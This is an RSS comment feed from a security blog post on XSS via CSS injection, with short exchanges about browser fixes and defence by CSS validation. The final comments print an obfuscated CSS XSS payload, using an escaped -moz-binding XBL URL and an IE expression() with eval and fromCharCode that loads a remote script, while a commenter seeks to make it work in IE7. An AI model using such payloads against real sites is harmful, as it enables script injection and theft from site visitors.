<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Ultimate XSS CSS injection</title>
	<atom:link href="http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/</link>
	<description>A tool for designers dealing with programmers dealing with designers...</description>
	<pubDate>Tue, 16 Mar 2010 17:32:59 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
		<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1681</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Wed, 13 Jan 2010 13:23:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1681</guid>
		<description>@sim

Validate the CSS using a CSS parser like anti-samy</description>
		<content:encoded><![CDATA[<p>@sim</p>
<p>Validate the CSS using a CSS parser like anti-samy</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sim</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1680</link>
		<dc:creator>sim</dc:creator>
		<pubDate>Wed, 13 Jan 2010 04:43:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1680</guid>
		<description>how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?</description>
		<content:encoded><![CDATA[<p>how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1332</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Thu, 09 Oct 2008 20:03:01 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1332</guid>
		<description>Yeah it's fixed in FF3 final, I think the beta it was still in but they removed it :(

I thought it was possible to do it inline but Giorgio mentioned it's only available in chrome :(</description>
		<content:encoded><![CDATA[<p>Yeah it&#8217;s fixed in FF3 final, I think the beta it was still in but they removed it <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>I thought it was possible to do it inline but Giorgio mentioned it&#8217;s only available in chrome <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Vinicius K-Max</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1331</link>
		<dc:creator>Vinicius K-Max</dc:creator>
		<pubDate>Thu, 09 Oct 2008 19:16:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1331</guid>
		<description>Firefox 3 fixed this xml hole?</description>
		<content:encoded><![CDATA[<p>Firefox 3 fixed this xml hole?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: yasir</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1295</link>
		<dc:creator>yasir</dc:creator>
		<pubDate>Tue, 02 Sep 2008 04:59:21 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1295</guid>
		<description>coo000lllL  :::::::: good work</description>
		<content:encoded><![CDATA[<p>coo000lllL  :::::::: good work</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Sun, 20 Jan 2008 03:02:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092</guid>
		<description>Please take a look in here: 
hxxp://noconnexion.wordpress.com/</description>
		<content:encoded><![CDATA[<p>Please take a look in here:<br />
hxxp://noconnexion.wordpress.com/</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Fri, 18 Jan 2008 15:57:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090</guid>
		<description>Yep tested on IE and Firefox</description>
		<content:encoded><![CDATA[<p>Yep tested on IE and Firefox</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Fri, 18 Jan 2008 15:55:35 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089</guid>
		<description>I guess I was using the converted version in my css here: 
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#38;#x *** x27&#38;#x29 : 1);
}

I didn't use all the converted code for obvious reasons. Can you please confirm that you've done this through css and it works ? If yes I'll stop asking and I'll work my ass to make this work.</description>
		<content:encoded><![CDATA[<p>I guess I was using the converted version in my css here:<br />
b</p>
<p>{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&amp;#x *** x27&amp;#x29 : 1);<br />
}</p>
<p>I didn&#8217;t use all the converted code for obvious reasons. Can you please confirm that you&#8217;ve done this through css and it works ? If yes I&#8217;ll stop asking and I&#8217;ll work my ass to make this work.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Fri, 18 Jan 2008 15:30:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088</guid>
		<description>@no.connexion

Dude you need to run "convert" in Hackvertor first before adding it to the page.</description>
		<content:encoded><![CDATA[<p>@no.connexion</p>
<p>Dude you need to run &#8220;convert&#8221; in Hackvertor first before adding it to the page.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Fri, 18 Jan 2008 14:50:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087</guid>
		<description>Thanks for response.
Here are my final thoughts. 
Added in html the following:

...
&#60;style type="text/css"&#62;
@import url(http://www.example.com/css/test.css);
&#60;/style&#62;
&#60;/head&#62;
&#60;body&#62;
&#60;b&#62; This IS a test &#60;/b&#62;
&#60;/body&#62;
...

and the in test.css:
...
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#60;@hex_ent&#62;xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(&#60;@tocharcodes&#62;http://businessinfo.co.uk/labs/xss/xss.js&#60;@/tocharcodes&#62;));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;')&#60;@/hex_ent&#62; : 1);
}
...

OR

in test.css
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#38;#x *** x27&#38;#x29 : 1);
}

AND it works fine for Firefox but IE70 does nothing. I'm using 7.0.5730.13.</description>
		<content:encoded><![CDATA[<p>Thanks for response.<br />
Here are my final thoughts.<br />
Added in html the following:</p>
<p>&#8230;<br />
&lt;style type=&#8221;text/css&#8221;&gt;<br />
@import url(http://www.example.com/css/test.css);<br />
&lt;/style&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;b&gt; This IS a test &lt;/b&gt;<br />
&lt;/body&gt;<br />
&#8230;</p>
<p>and the in test.css:<br />
&#8230;<br />
b</p>
<p>{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&lt;@hex_ent&gt;xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(&#8217;x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(&lt;@tocharcodes&gt;http://businessinfo.co.uk/labs/xss/xss.js&lt;@/tocharcodes&gt;));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;&#8217;)&lt;@/hex_ent&gt; : 1);<br />
}<br />
&#8230;</p>
<p>OR</p>
<p>in test.css<br />
b</p>
<p>{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&amp;#x *** x27&amp;#x29 : 1);<br />
}</p>
<p>AND it works fine for Firefox but IE70 does nothing. I&#8217;m using 7.0.5730.13.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
